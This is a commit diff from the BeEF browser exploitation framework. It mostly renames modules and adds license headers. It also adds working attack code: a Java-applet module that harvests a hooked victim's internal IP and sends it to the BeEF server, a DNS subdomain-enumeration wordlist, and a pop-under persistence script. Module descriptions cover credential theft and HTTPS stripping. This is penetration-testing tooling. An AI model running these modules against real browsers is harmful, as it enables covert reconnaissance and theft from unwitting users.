description: "This module retrieves saved username/password combinations from the login page on the hooked domain.<br /><br />It will fail if more than one set of domain credentials are saved in the browser."
authors: ["bcoles"]

0
modules/browser/get_stored_credentials/module.rb → modules/hooked_domain/get_stored_credentials/module.rb
View File

0
modules/browser/link_rewrite/command.js → modules/hooked_domain/link_rewrite/command.js
View File

2
modules/browser/link_rewrite/config.yaml → modules/hooked_domain/link_rewrite/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links."
authors: ["passbe"]

0
modules/browser/link_rewrite/module.rb → modules/hooked_domain/link_rewrite/module.rb
View File

0
modules/browser/link_rewrite_sslstrip/command.js → modules/hooked_domain/link_rewrite_sslstrip/command.js
View File

2
modules/browser/link_rewrite_sslstrip/config.yaml → modules/hooked_domain/link_rewrite_sslstrip/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
link_rewrite_sslstrip:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace HREFs (HTTPS)"
description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
authors: ["bcoles"]

0
modules/browser/link_rewrite_sslstrip/module.rb → modules/hooked_domain/link_rewrite_sslstrip/module.rb
View File

0
modules/browser/prompt_dialog/command.js → modules/hooked_domain/prompt_dialog/command.js
View File

2
modules/browser/prompt_dialog/config.yaml → modules/hooked_domain/prompt_dialog/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
prompt_dialog:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]

0
modules/browser/prompt_dialog/module.rb → modules/hooked_domain/prompt_dialog/module.rb
View File

0
modules/browser/replace_video/command.js → modules/hooked_domain/replace_video/command.js
View File

2
modules/browser/replace_video/config.yaml → modules/hooked_domain/replace_video/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
replace_video:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]

0
modules/browser/replace_video/module.rb → modules/hooked_domain/replace_video/module.rb
View File

0
modules/browser/rickroll/command.js → modules/hooked_domain/rickroll/command.js
View File

2
modules/browser/rickroll/config.yaml → modules/hooked_domain/rickroll/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
rickroll:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]

0
modules/browser/rickroll/module.rb → modules/hooked_domain/rickroll/module.rb
View File

0
modules/browser/site_redirect/command.js → modules/hooked_domain/site_redirect/command.js
View File

2
modules/browser/site_redirect/config.yaml → modules/hooked_domain/site_redirect/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]

0
modules/browser/site_redirect/module.rb → modules/hooked_domain/site_redirect/module.rb
View File

0
modules/browser/site_redirect_iframe/command.js → modules/hooked_domain/site_redirect_iframe/command.js
View File

2
modules/browser/site_redirect_iframe/config.yaml → modules/hooked_domain/site_redirect_iframe/config.yaml
View File

@@ -17,7 +17,7 @@ beef:
module:
site_redirect_iframe:
enable: true
category: "Browser"
category: "Hooked Domain"
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]

0
modules/browser/site_redirect_iframe/module.rb → modules/hooked_domain/site_redirect_iframe/module.rb
View File

16
modules/host/detect_software/command.js
View File

@@ -1,5 +1,17 @@
//
// detect software
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {

15
modules/host/detect_software/config.yaml
View File

@@ -1,4 +1,17 @@
# detect software
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:

16
modules/host/detect_software/module.rb
View File

@@ -1,6 +1,18 @@
# detect software
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_software < BeEF::Core::Command
def post_execute

44
modules/host/get_internal_ip/command.js Executable file
View File

@@ -0,0 +1,44 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/';
var internal_counter = 0;
var timeout = 30;
var output;
beef.dom.attachApplet('get_internal_ip', 'get_internal_ip', 'get_internal_ip' ,
applet_uri, null, null);
function waituntilok() {
try {
output = document.get_internal_ip.ip();
beef.net.send('<%= @command_url %>', <%= @command_id %>, output);
beef.dom.detachApplet('get_internal_ip');
return;
} catch (e) {
internal_counter++;
if (internal_counter > timeout) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Timeout after '+timeout+' seconds');
beef.dom.detachApplet('get_internal_ip');
return;
}
setTimeout(function() {waituntilok()},1000);
}
}
setTimeout(function() {waituntilok()},5000);
});

26
modules/host/get_internal_ip/config.yaml Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_internal_ip:
enable: true
category: "Host"
name: "Get Internal IP"
description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet"
authors: ["antisnatchor"]
target:
working: ["IE", "FF", "O"]
user_notify: ["C", "S"]

BIN
modules/host/get_internal_ip/get_internal_ip.class Executable file
View File

Binary file not shown.

49
modules/host/get_internal_ip/get_internal_ip.java Executable file
View File

@@ -0,0 +1,49 @@
import java.applet.Applet;
import java.applet.AppletContext;
import java.net.InetAddress;
import java.net.Socket;
/* to compiled it in MacOSX SnowLeopard/Lion:
* javac -cp /System/Library/Frameworks/JavaVM.framework/Resources/Deploy.bundle/Contents/Resources/Java/plugin.jar get_internal_ip.java
* author: antisnatchor (adapted from Lars Kindermann applet)
*/
public class get_internal_ip extends Applet {
String Ip = "unknown";
String internalIp = "unknown";
String IpL = "unknown";
private String MyIP(boolean paramBoolean) {
Object obj = "unknown";
String str2 = getDocumentBase().getHost();
int i = 80;
if (getDocumentBase().getPort() != -1) i = getDocumentBase().getPort();
try {
String str1 = new Socket(str2, i).getLocalAddress().getHostAddress();
if (!str1.equals("255.255.255.255")) obj = str1;
} catch (SecurityException localSecurityException) {
obj = "FORBIDDEN";
} catch (Exception localException1) {
obj = "ERROR";
}
if (paramBoolean) try {
obj = new Socket(str2, i).getLocalAddress().getHostName();
} catch (Exception localException2) {
}
return (String) obj;
}
public void init() {
this.Ip = MyIP(false);
}
public String ip() {
return this.Ip;
}
public String internalIp() {
return this.internalIp;
}
public void start() {
}
}

35
modules/host/get_internal_ip/module.rb Executable file
View File

@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_internal_ip < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip/get_internal_ip.class', '/get_internal_ip', 'class')
end
#def self.options
# return [
# { 'name' => 'applet_name', 'description' => 'Applet Name', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' },
# ]
#end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class')
end
end

15
modules/misc/local_file_theft/command.js
View File

@@ -1,3 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// local_file_theft
//
// Shamelessly plagurised from kos.io/xsspwn

15
modules/misc/local_file_theft/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# local_file_theft
#
# Shamelessly plagurised from kos.io/xsspwn

15
modules/misc/local_file_theft/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# local_file_theft
#
# Shamelessly plagurised from kos.io/xsspwn

2
modules/network/dns_enumeration/command.js
View File

@@ -26,7 +26,7 @@ beef.execute(function() {
if(dns_list!="%default%") {
hostnames = dns_list.split(",");
} else {
hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webserver", "website", "win", "windows", "ww", "www", "xml");
hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml");
}
function notify() {

2
modules/network/dns_enumeration/config.yaml
View File

@@ -23,4 +23,4 @@ beef:
authors: ["jgaliana"]
target:
working: ["FF", "C"]
not_working: ["O"]
not_working: ["IE", "S", "O"]

2
modules/persistence/iframe_above/command.js
View File

@@ -14,6 +14,6 @@
// limitations under the License.
//
beef.execute(function() {
beef.session.persistant();
beef.session.persistent();
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
});

4
modules/persistence/popunder_window/command.js
View File

@@ -15,9 +15,9 @@
//
beef.execute(function() {
var result="Pop-under window successfully created!";
var result = "Pop-under window successfully created!";
window.open(window.location.protocol + '//' + window.location.host + '/demos/basic.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
window.open('http://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
window.focus();

2
modules/persistence/popunder_window/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Persistence"
name: "Create Pop Under"
description: "Creates a new discrete pop under window with the beef hook included.<br><br>This module will add another browser node to the tree. It will be a duplicate. This will be addressed in a future release"
description: "This module creates a new discrete pop under window with the BeEF hook included.<br><br>Another browser node will be added to the hooked browser tree."
authors: ["ethicalhack3r"]
target:
user_notify: ["ALL"]

16
modules/phonegap/phonegap_beep/command.js
View File

@@ -1,4 +1,18 @@
//
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// make the phone beep
//
beef.execute(function() {

15
modules/phonegap/phonegap_beep/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
beef:

15
modules/phonegap/phonegap_beep/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#

16
modules/phonegap/phonegap_detect/command.js
View File

@@ -1,4 +1,18 @@
//
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// detect phonegap
//
beef.execute(function() {

15
modules/phonegap/phonegap_detect/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
beef:

15
modules/phonegap/phonegap_detect/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#

16
modules/phonegap/phonegap_file_upload/command.js
View File

@@ -1,4 +1,18 @@
//
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// phonegap_upload
//
beef.execute(function() {

15
modules/phonegap/phonegap_file_upload/config.yaml
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
beef:

15
modules/phonegap/phonegap_file_upload/module.rb
View File

@@ -1,3 +1,18 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#

Some files were not shown because too many files have changed in this diff Show More